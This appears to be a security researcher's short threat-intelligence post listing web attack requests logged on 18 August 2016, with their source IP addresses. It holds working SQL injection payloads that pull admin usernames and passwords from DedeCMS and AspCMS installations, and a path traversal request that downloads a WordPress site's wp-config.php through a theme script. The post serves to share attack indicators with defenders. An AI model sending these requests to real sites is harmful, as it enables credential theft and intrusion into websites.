Interesting Web Attacks 8-18-2016

1. Interesting web attacks
2. *******
3.  
4. 27.204.64.94
5.  
6. GET/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from `#@__admin` limit 0,1),5,6,7,8,9#@`\'` &_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1
7.  
8. GET/admin/_content/_about/aspcms_aboutedit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1 HTTP/1.1
9.  
10. GET/admin/_content/_about/aspcms_aboutedit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1 HTTP/1.1
11.  
12. 37.130.227.133
13.  
14. POST /wp-content/themes/elegance/lib/scripts/dl-skin.php HTTP/1.1
15. Host: mywebsite.com
16. Content-Length: 60
17. Accept-Encoding: gzip, deflate
18. Accept: */*
19. User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
20. Connection: keep-alive
21. Content-Type: application/x-www-form-urlencoded
22. _mysite_download_skin=../../../../../wp-config.php
23.  
24.  
25. *******
26. More FROM @neonprimetime security
27.  
28. http://pastebin.com/u/Neonprimetime
29. https://www.virustotal.com/en/USER/neonprimetime/
30. https://twitter.com/neonprimetime
31. https://www.reddit.com/USER/neonprimetime